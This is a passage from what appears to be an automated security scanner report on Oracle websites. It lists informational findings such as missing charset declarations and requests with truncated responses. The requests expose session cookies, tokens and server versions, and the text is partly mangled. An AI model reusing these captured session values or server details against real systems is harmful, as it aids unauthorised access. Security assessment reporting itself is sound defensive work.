Certain
Host:
https://campus.oracle.com
Path:
/campus/gwt/otn.todo.TodoApp/TodoApp.html
Request
GET /campus/gwt/otn.todo.TodoApp/TodoApp.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/zealand-apply.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server...[SNIP]...
15.53. https://cloud.oracle.com/mycloud/f
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cloud.oracle.com
Path:
/mycloud/f
Request
GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service:home:0:::::;q=0.3%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA
Response
HTTP/1.1 200 OK-11g_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/...[SNIP]...
15.54. https://cloud.oracle.com/mycloud/wwv_flow.accept
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cloud.oracle.com
Path:
/mycloud/wwv_flow.accept
Request
POST /mycloud/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service2:notify_me:0:::::;q=0.3DD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names...[SNIP]...
Response
HTTP/1.1 200 OK-11g_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/...[SNIP]...
15.55. https://irecruitment.oracle.com/OA_HTML/OA.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/OA.jsp
Request
GET /OA_HTML/OA.jsp?OAFunc=IRC_VIS_ADV_JOB_SEARCH_PAGE&_ti=209088196&oapc=2&oas=c63Ec25IXJtclVMeE1fbdA.. HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..;q=0.3d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; oracle.uix=0^^GMT-5:00^p; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisHomePG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bdocument.location%25253D%252527OA.jsp%25253FOAFunc%25253DIRC_VIS_ADV_JOB_SEARCH_PAGE%252526_ti%25253D209088196%252526oa%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OKd59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure.oracle.com/OA_HTML/OA.jsp<head><title>Available Jobs</title><meta name="generator" content="Oracl...[SNIP]...
15.56. https://irecruitment.oracle.com/OA_HTML/RF.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/RF.jsp
Request
GET /OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA.. HTTP/1.1.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..;q=0.3d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; gpw_e24=no%20value; s_cc=true; s_sq=%5B%5BB%5D%5D; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C
Response
HTTP/1.1 200 OKd59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure.oracle.com/OA_HTML/OA.jsp<head><title>iRecruitment Visitor Home Page</title><meta name="generator...[SNIP]...
15.57. https://irecruitment.oracle.com/OA_HTML/blank.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/blank.html
Request
GET /OA_HTML/blank.html HTTP/1.1.oracle.com/OA_HTML/blank.html;q=0.3d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; oracle.uix=0^^GMT-5:00^p; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
15.58. https://login.oracle.com/oam/server/sso/auth_cred_submit
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/oam/server/sso/auth_cred_submit
Request
POST /oam/server/sso/auth_cred_submit HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000=1464845504205588723&OAM_REQ=VERSION_4%7EKk%252fxScRUpoZ7Ai84IFFZnAZ9XxsM1Ii8iVy4UnLMUA09vIONA1373ptUbdDbWK1I3N9QNYGFUjCSDxp0GzHunzGq%252fvmBT1AU8oHT9wFSl9DhSVwOc2bfDcq7LD59f1pwdrf60S...[SNIP]...
Response
HTTP/1.1 200 OKUS1EaweP001pGi_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:48:14 GMT; path=/.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
15.59. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/pls/orasso/orasso.wwsso_app_admin.ls_login
Request
GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/index.html;q=0.3
Response
HTTP/1.1 200 OKUS1EaweP001nsI_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:38 GMT; path=/.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
15.60. https://shop.oracle.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://shop.oracle.com
Path:
/
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/products/applications/peoplesoft-enterprise/hcm/index.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fus%2Fproducts%2Fapplications%2Fpeoplesoft-enterprise%2Fhcm%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Fpeoplesoft-enterprise%25252Fhcm%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Astore%25253Astorespareparts%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK-10g=dstore:home:0">
15.61. https://shop.oracle.com/pls/ostore/f
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://shop.oracle.com
Path:
/pls/ostore/f
Request
GET /pls/ostore/f?p=dstore:home:0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fus%2Fproducts%2Fapplications%2Fpeoplesoft-enterprise%2Fhcm%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Fpeoplesoft-enterprise%25252Fhcm%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Astore%25253Astorespareparts%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK-10g();...[SNIP]...
16. HTML does not specify charset
previous
next
There are 7 instances of this issue:
Issue description
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1 .
16.1. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html
Request
GET /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/gwt/otn.todo.TodoApp/TodoApp.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerContent-Type: text/html /head><body><script><!--.core.client.',qbc='com.google.gwt.http.client.'...[SNIP]...
16.2. http://crmondemand.oracle.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://crmondemand.oracle.com
Path:
/favicon.ico
Request
GET /favicon.ico HTTP/1.1;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 404 Not Found82d5c0;4aa5b97b7e5c0"Content-Type: text/html -11g Oracle-Web-Cache-11g/11.1.1.3.0 (G;max-age=60+0;age=0;ecid=49935404794318946,0:1)...[SNIP]...
16.3. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/sitestudio/ssajax/ssajax.js
Request
GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 404 Not Found"Content-Type: text/html -11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=35;ecid=49471153189356112,0:1)...[SNIP]...
16.4. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigation.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://crmondemand.oracle.com
Path:
/ocom/websites/crmoden/sitenavigation.js
Request
GET /ocom/websites/crmoden/sitenavigation.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 404 Not Found82d5c0"Content-Type: text/html -11g Oracle-Web-Cache-11g/11.1.1.3.0 (G;max-age=60+0;age=0;ecid=50152932002953784,0:1)...[SNIP]...
16.5. http://events.oracle.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://events.oracle.com
Path:
/
Request
GET / HTTP/1.1
Response
HTTP/1.1 200 OKContent-Type: text/html -11g Oracle-Web-Cache-11g/11.1.1.4.0 (G;max-age=0+0;age=0;ecid=143456613347962,0:1)/search?group=Events&keyword="/>
16.6. https://irecruitment.oracle.com/OA_HTML/blank.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/blank.html
Request
GET /OA_HTML/blank.html HTTP/1.1.oracle.com/OA_HTML/blank.html;q=0.3d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; oracle.uix=0^^GMT-5:00^p; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OKContent-Type: text/html
16.7. https://shop.oracle.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://shop.oracle.com
Path:
/
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/products/applications/peoplesoft-enterprise/hcm/index.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fus%2Fproducts%2Fapplications%2Fpeoplesoft-enterprise%2Fhcm%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Fpeoplesoft-enterprise%25252Fhcm%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Astore%25253Astorespareparts%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK-10gContent-Type: text/html =dstore:home:0">
17. Content type incorrectly stated
previous
next
There are 3 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
Issue remediation
